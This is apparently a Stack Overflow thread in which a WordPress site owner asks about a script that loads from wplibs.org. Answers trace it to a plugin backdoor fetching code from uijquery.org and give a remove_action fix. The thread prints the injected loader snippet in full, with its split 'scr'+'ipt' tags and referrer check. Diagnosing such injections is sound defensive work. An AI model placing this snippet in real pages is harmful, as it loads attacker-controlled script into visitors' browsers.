# Strange behavior with script

Tags: javascript, jquery, wordpress

I'm running a new secured WordPress install (https). In my code I load some JavaScript files (modernizr, cookie, and my own)

jQuery is automatically loaded by WordPress.

Installed plugins are Yoast SEO, WPML and SMK Sidebars.

The issue is when I check the console in my browser, it shows me the following:

> Mixed Content: The page at 'https://www.myuri.com/' was loaded over
>   HTTPS, but requested an insecure script
>   'http://www.wplibs.org/jquery.min.js'. This request has been blocked;
>   the content must be served over HTTPS.

In the source code:

```
<script type="text/javascript">
if(!document.referrer || document.referrer == '') {
    document.write('<scr'+'ipt type="text/javascript" src="http://www.wplibs.org/jquery.min.js"></scr'+'ipt>');
} else {
    document.write('<scr'+'ipt type="text/javascript" src="http://www.wplibs.org/jquery.js"></scr'+'ipt>');
}
</script>
```

I'm looking where the script "wplibs.com/jquery.min.js" comes from but I can't find.

Someone has a idea?

Comment: You're using SSL and loading scripts from HTTP protocols, just look at the source and see what scripts aren't loaded from HTTPS. This is a security "feature" in newer browsers.

Comment: And the script could come from anywhere, it's probably included by the theme or a plugin etc ?

Comment: I use my own theme and the 3 plugin I use don't load that script.

Comment: @adeneo I know about SSL, the point is that I'm not including this file myself... It's a auto load but can't find from where/who/what

Comment: Can you try to use https instead of http in the above js code which you have  shown in your question?

Comment: Well, it's coming from somewhere. Wordpress doesn't include that URL, and if you have your own theme and plugins, you either enqueue that script somewhere, or you've been hacked, which isn't really very likely as the URL doesn't seem to lead anywhere ?

Comment: Strangely enough, someone seems have to issues with the exact same script -> http://stackoverflow.com/questions/29633749/how-can-i-find-and-delete-a-script-that-is-bottleneckng-my-websites-load-time, maybe you have been hacked ?

Comment: It looks like an attack but I'm running with mamp

Comment: If you're running on localhost, you're surely not hacked, but that URL doesn't seem to resolve, so something strange is going on ?

Comment: Really strange, because I'm not loading that script, and none of the plugins I use load it. I'm frustrated

Comment: If you disable all your plugins and change themes is it still there?

Comment: grep your wordpress folder(s) for "wplibs"

Comment: Hmm [http://wscheck.com/trust-report/wplibs.org](http://wscheck.com/trust-report/wplibs.org)

Comment: @dandavis I did, no results

Comment: ok, search your DB then, it has to live in one or the other, unless i'm confused about how WP works..

Comment: It generally wouldn't be in the DB, if it's outputted in the source it's probably added "in the loop" somewhere, but if it's some sort of attack it can be obfuscated in different ways in the PHP source. It does sound strange though ?

Comment: Really really strange, I ran a new WP install and the script disapears... Thank you all for your time (I stay frustrated because still don't know why)

Answer (score 2):

I found the problem. It is caused by plugins that make request to **http://uijquery.org/jquery-1.6.3.min.js** and get the body response, you will see the source code:

```
<script type="text/javascript">
  var now = new Date().getTime();
  if (now%2 == 0) {
    if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://www.wplibs.org/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://www.wplibs.org/jquery.js"></scr'+'ipt>'); } 
  }
</script>
```

Try to look inside the files for the token "jquery.org" or "uijquery.org".

Comment: Yes, it's that! I was going crazy with this, it started today. In my case WPML uses [http://uijquery.org/jquery-1.6.3.min.js](http://uijquery.org/jquery-1.6.3.min.js).

Comment: Those using WPML add this to `functions.php`: 
`remove_action( 'wp_footer', 'wp_func_jquery' );`

It removes the action that makes the request to uijquery.org

Answer (score 1):

@IvanRF is right!
I discovered before read it but it works for me too.
Just adding

```
remove_action('wp_footer', 'wp_func_jquery');
```

in `functions.php` of our WordPress theme.